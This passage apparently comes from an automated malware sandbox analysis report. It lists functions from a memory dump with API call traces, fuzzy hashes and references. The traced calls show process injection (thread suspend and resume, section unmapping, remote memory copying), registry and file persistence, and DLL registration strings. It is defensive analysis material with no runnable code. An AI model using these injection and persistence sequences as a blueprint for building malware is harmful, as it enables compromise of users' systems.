    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
